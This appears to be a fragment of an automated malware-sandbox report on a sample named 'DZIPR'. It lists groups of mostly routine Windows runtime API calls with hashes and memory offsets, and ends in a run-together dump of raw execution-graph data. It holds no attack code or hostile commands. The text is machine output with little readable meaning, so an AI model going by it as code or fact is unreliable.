                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          Similarity
                                          • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                          • String ID:
                                          • API String ID: 1602911419-0
                                          APIs
                                          • ClientToScreen.USER32(?,?), ref: 6FA4DB6D
                                          • GetDlgCtrlID.USER32(00000000), ref: 6FA4DB81
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 6FA4DB91
                                          • GetWindowRect.USER32(00000000,?), ref: 6FA4DBA3
                                          • PtInRect.USER32(?,?,?), ref: 6FA4DBB3
                                          • GetWindow.USER32(?,00000005), ref: 6FA4DBC0
                                          Similarity
                                          • API ID: Window$Rect$ClientCtrlLongScreen
                                          • String ID:
                                          • API String ID: 1315500227-0
                                          APIs
                                          Similarity
                                          • API ID: _memset
                                          • String ID: @$@$AfxFrameOrView90su$AfxMDIFrame90su
                                          • API String ID: 2102423945-1093365818
                                          APIs
                                          • GetMenuCheckMarkDimensions.USER32 ref: 6FA496F2
                                          • _memset.LIBCMT ref: 6FA4976A
                                          • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 6FA497CD
                                          • LoadBitmapW.USER32(00000000,00007FE3), ref: 6FA497E5
                                          Similarity
                                          • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
                                          • String ID:
                                          • API String ID: 4271682439-3916222277
                                          APIs
                                          • __getptd.LIBCMT ref: 6FA5C17F
                                            • Part of subcall function 6FA5A27F: __getptd_noexit.LIBCMT ref: 6FA5A282
                                            • Part of subcall function 6FA5A27F: __amsg_exit.LIBCMT ref: 6FA5A28F
                                          • __getptd.LIBCMT ref: 6FA5C190
                                          • __getptd.LIBCMT ref: 6FA5C19E
                                          Similarity
                                          • API ID: __getptd$__amsg_exit__getptd_noexit
                                          • String ID: MOC$csm
                                          • API String ID: 803148776-1389381023
                                          APIs
                                          • lstrlenW.KERNEL32(?,?,?,?,?,6FA449D6,?,00000003), ref: 6FA45685
                                          • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,?,00000000,00000000), ref: 6FA456B4
                                          • GetLastError.KERNEL32 ref: 6FA456C5
                                          • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,00000000,00000000,00000000), ref: 6FA456E5
                                          • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000000,00000000,00000000), ref: 6FA45709
                                          Similarity
                                          • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                          • String ID:
                                          • API String ID: 3322701435-0
                                          APIs
                                          • lstrlenW.KERNEL32(?,?,?), ref: 6FA4DA3D
                                          • _memset.LIBCMT ref: 6FA4DA5B
                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 6FA4DA75
                                          • lstrcmpW.KERNEL32(?,?,?,?), ref: 6FA4DA87
                                          • SetWindowTextW.USER32(00000000,?), ref: 6FA4DA93
                                            • Part of subcall function 6FA46DC1: __CxxThrowException@8.LIBCMT ref: 6FA46DD7
                                            • Part of subcall function 6FA46DC1: __EH_prolog3.LIBCMT ref: 6FA46DE4
                                          Similarity
                                          • API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
                                          • String ID:
                                          • API String ID: 4273134663-0
                                          APIs
                                          • __getptd.LIBCMT ref: 6FA5FE1A
                                            • Part of subcall function 6FA5A27F: __getptd_noexit.LIBCMT ref: 6FA5A282
                                            • Part of subcall function 6FA5A27F: __amsg_exit.LIBCMT ref: 6FA5A28F
                                          • __amsg_exit.LIBCMT ref: 6FA5FE3A
                                          • __lock.LIBCMT ref: 6FA5FE4A
                                          • InterlockedDecrement.KERNEL32(?), ref: 6FA5FE67
                                          • InterlockedIncrement.KERNEL32(02B628C0), ref: 6FA5FE92
                                          Similarity
                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                          • String ID:
                                          • API String ID: 4271482742-0
                                          APIs
                                          • TlsFree.KERNEL32(?,?,?,6FA4C179), ref: 6FA4C13B
                                          • GlobalHandle.KERNEL32(?), ref: 6FA4C149
                                          • GlobalUnlock.KERNEL32(00000000), ref: 6FA4C152
                                          • GlobalFree.KERNEL32(00000000), ref: 6FA4C159
                                          • DeleteCriticalSection.KERNEL32(?,?,?,6FA4C179), ref: 6FA4C163
                                            • Part of subcall function 6FA4BF5D: EnterCriticalSection.KERNEL32(?), ref: 6FA4BFBC
                                            • Part of subcall function 6FA4BF5D: LeaveCriticalSection.KERNEL32(?), ref: 6FA4BFCC
                                            • Part of subcall function 6FA4BF5D: LocalFree.KERNEL32(?), ref: 6FA4BFD5
                                            • Part of subcall function 6FA4BF5D: TlsSetValue.KERNEL32(?,00000000), ref: 6FA4BFE7
                                          Similarity
                                          • API ID: CriticalFreeGlobalSection$DeleteEnterHandleLeaveLocalUnlockValue
                                          • String ID:
                                          • API String ID: 1549993015-0
                                          APIs
                                            • Part of subcall function 6FA4C220: EnterCriticalSection.KERNEL32(6FA734A8,?,?,?,?,6FA4BB27,00000010,00000008,6FA4AF1F,6FA4AEC2,6FA46DDD,6FA4A591,6FA42BC2,?,?,?), ref: 6FA4C25A
                                            • Part of subcall function 6FA4C220: InitializeCriticalSection.KERNEL32(-000071A8,?,?,?,6FA4BB27,00000010,00000008,6FA4AF1F,6FA4AEC2,6FA46DDD,6FA4A591,6FA42BC2,?,?,?,?), ref: 6FA4C26C
                                            • Part of subcall function 6FA4C220: LeaveCriticalSection.KERNEL32(6FA734A8,?,?,?,6FA4BB27,00000010,00000008,6FA4AF1F,6FA4AEC2,6FA46DDD,6FA4A591,6FA42BC2,?,?,?,?), ref: 6FA4C279
                                            • Part of subcall function 6FA4C220: EnterCriticalSection.KERNEL32(-000071A8,?,?,?,?,6FA4BB27,00000010,00000008,6FA4AF1F,6FA4AEC2,6FA46DDD,6FA4A591,6FA42BC2,?,?,?), ref: 6FA4C289
                                            • Part of subcall function 6FA4BB0C: __EH_prolog3_catch.LIBCMT ref: 6FA4BB13
                                            • Part of subcall function 6FA46DC1: __CxxThrowException@8.LIBCMT ref: 6FA46DD7
                                            • Part of subcall function 6FA46DC1: __EH_prolog3.LIBCMT ref: 6FA46DE4
                                          • GetProcAddress.KERNEL32(00000000,HtmlHelpW), ref: 6FA51458
                                          • FreeLibrary.KERNEL32(?), ref: 6FA51468
                                          Similarity
                                          • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
                                          • String ID: HtmlHelpW$hhctrl.ocx
                                          • API String ID: 2853499158-3773518134
                                          APIs
                                          • ___BuildCatchObject.LIBCMT ref: 6FA5C7D6
                                            • Part of subcall function 6FA5C731: ___BuildCatchObjectHelper.LIBCMT ref: 6FA5C767
                                          • _UnwindNestedFrames.LIBCMT ref: 6FA5C7ED
                                          • ___FrameUnwindToState.LIBCMT ref: 6FA5C7FB
                                          Similarity
                                          • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                          • String ID: csm
                                          • API String ID: 2163707966-1018135373
                                          APIs
                                          • GetModuleHandleA.KERNEL32(KERNEL32,6FA577D7), ref: 6FA5ED7C
                                          • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 6FA5ED8C
                                          Similarity
                                          • API ID: AddressHandleModuleProc
                                          • String ID: IsProcessorFeaturePresent$KERNEL32
                                          • API String ID: 1646373207-3105848591
                                          APIs
                                          Similarity
                                          • API ID: File$SizeTime_memset
                                          • String ID:
                                          • API String ID: 151880914-0
                                          APIs
                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6FA6084F
                                          • __isleadbyte_l.LIBCMT ref: 6FA60883
                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,6FA540D8,6FA6BF84,00000000,00000000,?,?,?,?,6FA540D8,00000000,?), ref: 6FA608B4
                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,6FA540D8,00000001,00000000,00000000,?,?,?,?,6FA540D8,00000000,?), ref: 6FA60922
                                          Similarity
                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                          • String ID:
                                          • API String ID: 3058430110-0
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 6FA48ED0
                                            • Part of subcall function 6FA49C7C: __EH_prolog3.LIBCMT ref: 6FA49C83
                                          • __wcsdup.LIBCMT ref: 6FA48EF2
                                          • GetCurrentThread.KERNEL32 ref: 6FA48F1F
                                          • GetCurrentThreadId.KERNEL32 ref: 6FA48F28
                                          Similarity
                                          • API ID: CurrentH_prolog3Thread$__wcsdup
                                          • String ID:
                                          • API String ID: 190065205-0
                                          APIs
                                          • SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 6FA51D33
                                          • SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 6FA51D5E
                                          • GetCapture.USER32 ref: 6FA51D70
                                          • SendMessageW.USER32(00000000,0000001F,00000000,00000000), ref: 6FA51D7F
                                          Similarity
                                          • API ID: MessageSend$Capture
                                          • String ID:
                                          • API String ID: 1665607226-0
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 6FA46A8A
                                            • Part of subcall function 6FA468E2: _malloc.LIBCMT ref: 6FA46900
                                          • __CxxThrowException@8.LIBCMT ref: 6FA46AC0
                                          • FormatMessageW.KERNEL32(00001100,00000000,6FA6C050,00000800,000000FF,00000000,00000000,?,?,6FA6D898,00000004,6FA416A6,?,6FA4155A,8007000E,6FA413DE), ref: 6FA46AEA
                                          • LocalFree.KERNEL32(000000FF,000000FF,6FA4279F), ref: 6FA46B12
                                          Similarity
                                          • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc
                                          • String ID:
                                          • API String ID: 1776251131-0
                                          APIs
                                          • RegSetValueExW.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 6FA4D194
                                          • RegCloseKey.ADVAPI32(00000000), ref: 6FA4D19D
                                          • swprintf.LIBCMT ref: 6FA4D1BA
                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 6FA4D1CB
                                          Similarity
                                          • API ID: ClosePrivateProfileStringValueWriteswprintf
                                          • String ID:
                                          • API String ID: 22681860-0
                                          APIs
                                            • Part of subcall function 6FA468E2: _malloc.LIBCMT ref: 6FA46900
                                          • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 6FA472BB
                                          • GetCurrentProcess.KERNEL32(?,00000000), ref: 6FA472C1
                                          • DuplicateHandle.KERNEL32(00000000), ref: 6FA472C4
                                          • GetLastError.KERNEL32(?), ref: 6FA472DF
                                          Similarity
                                          • API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
                                          • String ID:
                                          • API String ID: 3704204646-0
                                          APIs
                                          • GetTopWindow.USER32(?), ref: 6FA50F9D
                                          • GetTopWindow.USER32(00000000), ref: 6FA50FDC
                                          • GetWindow.USER32(00000000,00000002), ref: 6FA50FFA
                                          Similarity
                                          • API ID: Window
                                          • String ID:
                                          • API String ID: 2353593579-0
                                          APIs
                                          Similarity
                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                          • String ID:
                                          • API String ID: 3016257755-0
                                          APIs
                                          • GetDlgItem.USER32(?,?), ref: 6FA503DC
                                          • GetTopWindow.USER32(00000000), ref: 6FA503EF
                                            • Part of subcall function 6FA503CF: GetWindow.USER32(00000000,00000002), ref: 6FA50436
                                          • GetTopWindow.USER32(?), ref: 6FA5041F
                                          Similarity
                                          • API ID: Window$Item
                                          • String ID:
                                          • API String ID: 369458955-0
                                          APIs
                                          • __getptd.LIBCMT ref: 6FA60586
                                            • Part of subcall function 6FA5A27F: __getptd_noexit.LIBCMT ref: 6FA5A282
                                            • Part of subcall function 6FA5A27F: __amsg_exit.LIBCMT ref: 6FA5A28F
                                          • __getptd.LIBCMT ref: 6FA6059D
                                          • __amsg_exit.LIBCMT ref: 6FA605AB
                                          • __lock.LIBCMT ref: 6FA605BB
                                          Similarity
                                          • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                          • String ID:
                                          • API String ID: 3521780317-0
                                          APIs
                                            • Part of subcall function 6FA4A59C: GetModuleHandleW.KERNEL32(KERNEL32,6FA4A6B6), ref: 6FA4A5AA
                                            • Part of subcall function 6FA4A59C: GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6FA4A5CB
                                            • Part of subcall function 6FA4A59C: GetProcAddress.KERNEL32(ReleaseActCtx), ref: 6FA4A5DD
                                            • Part of subcall function 6FA4A59C: GetProcAddress.KERNEL32(ActivateActCtx), ref: 6FA4A5EF
                                            • Part of subcall function 6FA4A59C: GetProcAddress.KERNEL32(DeactivateActCtx), ref: 6FA4A601
                                          • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 6FA4A6D0
                                          • SetLastError.KERNEL32(0000006F), ref: 6FA4A6E7
                                          Strings
                                          Similarity
                                          • API ID: AddressProc$Module$ErrorFileHandleLastName
                                          • String ID:
                                          • API String ID: 2524245154-3916222277
                                          APIs
                                          • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 6FA48E78
                                          • PathFindExtensionW.SHLWAPI(?), ref: 6FA48E8E
                                            • Part of subcall function 6FA48BDF: __EH_prolog3_GS.LIBCMT ref: 6FA48BE9
                                            • Part of subcall function 6FA48BDF: GetModuleHandleW.KERNEL32(kernel32.dll,00000260,6FA48EB7,?,?), ref: 6FA48C19
                                            • Part of subcall function 6FA48BDF: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 6FA48C2D
                                            • Part of subcall function 6FA48BDF: ConvertDefaultLocale.KERNEL32(?), ref: 6FA48C69
                                            • Part of subcall function 6FA48BDF: ConvertDefaultLocale.KERNEL32(?), ref: 6FA48C77
                                            • Part of subcall function 6FA48BDF: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 6FA48C94
                                            • Part of subcall function 6FA48BDF: ConvertDefaultLocale.KERNEL32(?), ref: 6FA48CBF
                                            • Part of subcall function 6FA48BDF: ConvertDefaultLocale.KERNEL32(000003FF), ref: 6FA48CC8
                                            • Part of subcall function 6FA48BDF: GetModuleFileNameW.KERNEL32(6FA40000,?,00000105), ref: 6FA48D7F
                                          Strings
                                          Similarity
                                          • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3_HandlePath
                                          • String ID: %s%s.dll
                                          • API String ID: 1311856149-1649984862
                                          APIs
                                            • Part of subcall function 6FA55017: __getptd.LIBCMT ref: 6FA5501D
                                            • Part of subcall function 6FA55017: __getptd.LIBCMT ref: 6FA5502D
                                          • __getptd.LIBCMT ref: 6FA5C54B
                                            • Part of subcall function 6FA5A27F: __getptd_noexit.LIBCMT ref: 6FA5A282
                                            • Part of subcall function 6FA5A27F: __amsg_exit.LIBCMT ref: 6FA5A28F
                                          • __getptd.LIBCMT ref: 6FA5C559
                                          Strings
                                          Similarity
                                          • API ID: __getptd$__amsg_exit__getptd_noexit
                                          • String ID: csm
                                          • API String ID: 803148776-1018135373
                                          APIs
                                          • EnterCriticalSection.KERNEL32(?), ref: 6FA4BFBC
                                          • LeaveCriticalSection.KERNEL32(?), ref: 6FA4BFCC
                                          • LocalFree.KERNEL32(?), ref: 6FA4BFD5
                                          • TlsSetValue.KERNEL32(?,00000000), ref: 6FA4BFE7
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                          • String ID:
                                          • API String ID: 2949335588-0
                                          • Opcode ID: 605128c5e6ef6bfc39aa7d9491ca99a663fcd7f065bcee6b100e9f0f2d11bba5
                                          • Instruction ID: c8b47b3f93d9fc419ba9b22d0d914f8976775bc1989e1c22fa0bf58e52daf693
                                          • Opcode Fuzzy Hash: 605128c5e6ef6bfc39aa7d9491ca99a663fcd7f065bcee6b100e9f0f2d11bba5
                                          • Instruction Fuzzy Hash: 7C115631600704EFDB14CF64C884FAAB7A8FF4A365F10852AE15A8B5A1CB75F891CF20
                                          APIs
                                          • EnterCriticalSection.KERNEL32(6FA734A8,?,?,?,?,6FA4BB27,00000010,00000008,6FA4AF1F,6FA4AEC2,6FA46DDD,6FA4A591,6FA42BC2,?,?,?), ref: 6FA4C25A
                                          • InitializeCriticalSection.KERNEL32(-000071A8,?,?,?,6FA4BB27,00000010,00000008,6FA4AF1F,6FA4AEC2,6FA46DDD,6FA4A591,6FA42BC2,?,?,?,?), ref: 6FA4C26C
                                          • LeaveCriticalSection.KERNEL32(6FA734A8,?,?,?,6FA4BB27,00000010,00000008,6FA4AF1F,6FA4AEC2,6FA46DDD,6FA4A591,6FA42BC2,?,?,?,?), ref: 6FA4C279
                                          • EnterCriticalSection.KERNEL32(-000071A8,?,?,?,?,6FA4BB27,00000010,00000008,6FA4AF1F,6FA4AEC2,6FA46DDD,6FA4A591,6FA42BC2,?,?,?), ref: 6FA4C289
                                            • Part of subcall function 6FA46DC1: __CxxThrowException@8.LIBCMT ref: 6FA46DD7
                                            • Part of subcall function 6FA46DC1: __EH_prolog3.LIBCMT ref: 6FA46DE4
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
                                          • String ID:
                                          • API String ID: 2895727460-0
                                          • Opcode ID: 2579aec95c204267e015463f38c2f603fe93c20714e6637674f11302661b0f10
                                          • Instruction ID: 947e859d5111ebba6358064a0a767af05614f41e93d2119d10c4823c7e694e80
                                          • Opcode Fuzzy Hash: 2579aec95c204267e015463f38c2f603fe93c20714e6637674f11302661b0f10
                                          • Instruction Fuzzy Hash: 9BF0F677104714AFCF241A99CC86F15BB6DEFD3375F260016E28C8A241CF78A4D6CAA2
                                          APIs
                                          • EnterCriticalSection.KERNEL32(6FA732EC,?,?,?,?,6FA4C0B7,?,00000004,6FA4AF00,6FA46DDD,6FA4A591,6FA42BC2,?,?,?,?), ref: 6FA4BA69
                                          • TlsGetValue.KERNEL32(6FA732D0,?,?,?,6FA4C0B7,?,00000004,6FA4AF00,6FA46DDD,6FA4A591,6FA42BC2,?,?,?,?,?), ref: 6FA4BA7D
                                          • LeaveCriticalSection.KERNEL32(6FA732EC,?,?,?,6FA4C0B7,?,00000004,6FA4AF00,6FA46DDD,6FA4A591,6FA42BC2,?,?,?,?,?), ref: 6FA4BA93
                                          • LeaveCriticalSection.KERNEL32(6FA732EC,?,?,?,6FA4C0B7,?,00000004,6FA4AF00,6FA46DDD,6FA4A591,6FA42BC2,?,?,?,?,?), ref: 6FA4BA9E
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2346481054.000000006FA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA40000, based on PE: true
                                          • Associated: 00000011.00000002.2346463037.000000006FA40000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346608257.000000006FA71000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346608257.000000006FA75000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000011.00000002.2346649429.000000006FA79000.00000002.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_6fa40000_DZIPR.jbxd
                                          Similarity
                                          • API ID: CriticalSection$Leave$EnterValue
                                          • String ID:
                                          • API String ID: 3969253408-0
                                          • Opcode ID: d80a3f817ca2a92ceba2fdd609be0368c5852a4e42442bdde28e4e356888e8bc
                                          • Instruction ID: 5f48c1e51b5195e902ad71c07cab34d901346c921e839042046842741960a4a8
                                          • Opcode Fuzzy Hash: d80a3f817ca2a92ceba2fdd609be0368c5852a4e42442bdde28e4e356888e8bc
                                          • Instruction Fuzzy Hash: 66F054762547049FDB208F58C888C5E77ADEF863B03198965E65993101D634F892DBB0

                                          Execution Graph

                                          Execution Coverage:3.2%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:0%
                                          Total number of Nodes:1917
                                          Total number of Limit Nodes:28
6c52bbc2 17022->17023 17024 6c52bbba 17022->17024 17023->17014 17026 6c524618 __setenvp 67 API calls 17024->17026 17025->17010 17026->17023 17130 6c5253bc 17027->17130 17029 6c52b535 GetStartupInfoA 17030 6c52a608 __calloc_crt 67 API calls 17029->17030 17037 6c52b556 17030->17037 17031 6c52b774 ___lock_fhandle 17031->16948 17032 6c52b6f1 GetStdHandle 17036 6c52b6bb 17032->17036 17033 6c52b756 SetHandleCount 17033->17031 17034 6c52a608 __calloc_crt 67 API calls 17034->17037 17035 6c52b703 GetFileType 17035->17036 17036->17031 17036->17032 17036->17033 17036->17035 17038 6c52e1d3 ___lock_fhandle InitializeCriticalSectionAndSpinCount 17036->17038 17037->17031 17037->17034 17037->17036 17039 6c52b63e 17037->17039 17038->17036 17039->17031 17039->17036 17040 6c52b667 GetFileType 17039->17040 17041 6c52e1d3 ___lock_fhandle InitializeCriticalSectionAndSpinCount 17039->17041 17040->17039 17041->17039 17043 6c52ba58 17042->17043 17044 6c52ba5d GetModuleFileNameA 17042->17044 17137 6c5302ad 17043->17137 17046 6c52ba84 17044->17046 17131 6c52b8a9 17046->17131 17049 6c5247c1 17049->16956 17055 6c52b7cb 17049->17055 17050 6c52bac0 17051 6c52a5c3 __malloc_crt 67 API calls 17050->17051 17052 6c52bac6 17051->17052 17052->17049 17053 6c52b8a9 _parse_cmdline 77 API calls 17052->17053 17054 6c52bae0 17053->17054 17054->17049 17056 6c52b7d4 17055->17056 17059 6c52b7d9 _strlen 17055->17059 17057 6c5302ad ___initmbctable 111 API calls 17056->17057 17057->17059 17058 6c5247ca 17058->16956 17070 6c525cbe 17058->17070 17059->17058 17060 6c52a608 __calloc_crt 67 API calls 17059->17060 17065 6c52b80e _strlen 17060->17065 17061 6c52b86c 17062 6c524618 __setenvp 67 API calls 17061->17062 17062->17058 17063 6c52a608 __calloc_crt 67 API calls 17063->17065 17064 6c52b892 17066 6c524618 __setenvp 67 API calls 17064->17066 17065->17058 17065->17061 17065->17063 17065->17064 17067 6c530997 _strcpy_s 67 API calls 17065->17067 17068 6c52b853 17065->17068 17066->17058 17067->17065 17068->17065 17069 
6c528034 __invoke_watson 10 API calls 17068->17069 17069->17068 17071 6c525ccc __IsNonwritableInCurrentImage 17070->17071 17436 6c52df82 17071->17436 17073 6c525cea __initterm_e 17075 6c525d09 __IsNonwritableInCurrentImage __initterm 17073->17075 17440 6c5244b4 17073->17440 17075->16956 17077 6c52a784 HeapDestroy 17076->17077 17078 6c52a72d 17076->17078 17077->16937 17079 6c52a772 HeapFree 17078->17079 17080 6c52a749 VirtualFree HeapFree 17078->17080 17079->17077 17080->17080 17081 6c52a771 17080->17081 17081->17079 17083 6c52a0f8 17082->17083 17084 6c52a0ec 17082->17084 17085 6c52a10c TlsFree 17083->17085 17087 6c52a11a 17083->17087 17086 6c52a033 __decode_pointer 6 API calls 17084->17086 17085->17087 17086->17083 17088 6c52a7ff RtlDeleteCriticalSection 17087->17088 17089 6c52a817 17087->17089 17090 6c524618 __setenvp 67 API calls 17088->17090 17091 6c52a829 RtlDeleteCriticalSection 17089->17091 17092 6c52a837 17089->17092 17090->17087 17091->17089 17092->16932 17097 6c52b786 17093->17097 17094 6c52b7c8 17094->16951 17095 6c524618 __setenvp 67 API calls 17095->17097 17096 6c52b79a RtlDeleteCriticalSection 17096->17097 17097->17094 17097->17095 17097->17096 17486 6c525d43 17098->17486 17100 6c525e90 17100->16924 17102 6c52a421 17101->17102 17103 6c52a3d6 17101->17103 17104 6c52a434 17102->17104 17105 6c52a42b TlsSetValue 17102->17105 17106 6c52a3ff 17103->17106 17107 6c52a3dc TlsGetValue 17103->17107 17104->16937 17105->17104 17109 6c52a033 __decode_pointer 6 API calls 17106->17109 17107->17106 17108 6c52a3ef TlsGetValue 17107->17108 17108->17106 17110 6c52a416 17109->17110 17509 6c52a299 17110->17509 17113 6c525bda Sleep GetModuleHandleW 17112->17113 17114 6c525bf8 17113->17114 17115 6c525bfc 17113->17115 17114->17113 17114->17115 17115->16968 17117 6c52a02a _raise 6 API calls 17116->17117 17118 6c525e9c __init_pointers __initp_misc_winsig 17117->17118 17127 6c52cdf3 17118->17127 17121 6c529fb8 __encode_pointer 6 API calls 17122 6c525ed8 17121->17122 17122->16982 
17124 6c52a7a3 17123->17124 17125 6c52a550 17124->17125 17126 6c52e1d3 ___lock_fhandle InitializeCriticalSectionAndSpinCount 17124->17126 17125->16972 17125->16992 17126->17124 17128 6c529fb8 __encode_pointer 6 API calls 17127->17128 17129 6c525ece 17128->17129 17129->17121 17130->17029 17132 6c52b8c8 17131->17132 17135 6c52b935 17132->17135 17141 6c530a52 17132->17141 17134 6c52ba33 17134->17049 17134->17050 17135->17134 17136 6c530a52 77 API calls _parse_cmdline 17135->17136 17136->17135 17138 6c5302b6 17137->17138 17139 6c5302bd 17137->17139 17258 6c530113 17138->17258 17139->17044 17144 6c5309ff 17141->17144 17147 6c528659 17144->17147 17148 6c52866c 17147->17148 17152 6c5286b9 17147->17152 17149 6c52a27f __getptd 67 API calls 17148->17149 17150 6c528671 17149->17150 17151 6c528699 17150->17151 17155 6c53057a 17150->17155 17151->17152 17170 6c52fe0e 17151->17170 17152->17132 17156 6c530586 ___lock_fhandle 17155->17156 17157 6c52a27f __getptd 67 API calls 17156->17157 17158 6c53058b 17157->17158 17159 6c5305b9 17158->17159 17161 6c53059d 17158->17161 17160 6c52a914 __lock 67 API calls 17159->17160 17162 6c5305c0 17160->17162 17163 6c52a27f __getptd 67 API calls 17161->17163 17186 6c53053c 17162->17186 17165 6c5305a2 17163->17165 17167 6c5305b0 ___lock_fhandle 17165->17167 17169 6c525bff __amsg_exit 67 API calls 17165->17169 17167->17151 17169->17167 17171 6c52fe1a ___lock_fhandle 17170->17171 17172 6c52a27f __getptd 67 API calls 17171->17172 17173 6c52fe1f 17172->17173 17174 6c52fe31 17173->17174 17175 6c52a914 __lock 67 API calls 17173->17175 17177 6c52fe3f ___lock_fhandle 17174->17177 17179 6c525bff __amsg_exit 67 API calls 17174->17179 17176 6c52fe4f 17175->17176 17178 6c52fe98 17176->17178 17181 6c52fe80 InterlockedIncrement 17176->17181 17182 6c52fe66 InterlockedDecrement 17176->17182 17177->17152 17254 6c52fea9 17178->17254 17179->17177 17181->17178 17182->17181 17183 6c52fe71 17182->17183 17183->17181 17184 6c524618 __setenvp 67 API calls 17183->17184 
17185 6c52fe7f 17184->17185 17185->17181 17187 6c530540 17186->17187 17188 6c530572 17186->17188 17187->17188 17197 6c530414 InterlockedIncrement 17187->17197 17194 6c5305e4 17188->17194 17190 6c530553 17190->17188 17209 6c5304a3 17190->17209 17253 6c52a83a RtlLeaveCriticalSection 17194->17253 17196 6c5305eb 17196->17165 17198 6c530432 InterlockedIncrement 17197->17198 17199 6c530435 17197->17199 17198->17199 17200 6c530442 17199->17200 17201 6c53043f InterlockedIncrement 17199->17201 17202 6c53044f 17200->17202 17203 6c53044c InterlockedIncrement 17200->17203 17201->17200 17204 6c530459 InterlockedIncrement 17202->17204 17206 6c53045c 17202->17206 17203->17202 17204->17206 17205 6c530475 InterlockedIncrement 17205->17206 17206->17205 17207 6c530485 InterlockedIncrement 17206->17207 17208 6c530490 InterlockedIncrement 17206->17208 17207->17206 17208->17190 17210 6c530537 17209->17210 17211 6c5304b4 InterlockedDecrement 17209->17211 17210->17188 17223 6c5302cb 17210->17223 17212 6c5304c9 InterlockedDecrement 17211->17212 17213 6c5304cc 17211->17213 17212->17213 17214 6c5304d6 InterlockedDecrement 17213->17214 17215 6c5304d9 17213->17215 17214->17215 17216 6c5304e3 InterlockedDecrement 17215->17216 17217 6c5304e6 17215->17217 17216->17217 17218 6c5304f0 InterlockedDecrement 17217->17218 17220 6c5304f3 17217->17220 17218->17220 17219 6c53050c InterlockedDecrement 17219->17220 17220->17219 17221 6c53051c InterlockedDecrement 17220->17221 17222 6c530527 InterlockedDecrement 17220->17222 17221->17220 17222->17210 17224 6c5302e2 17223->17224 17225 6c53034f 17223->17225 17224->17225 17230 6c530316 17224->17230 17235 6c524618 __setenvp 67 API calls 17224->17235 17226 6c524618 __setenvp 67 API calls 17225->17226 17227 6c53039c 17225->17227 17228 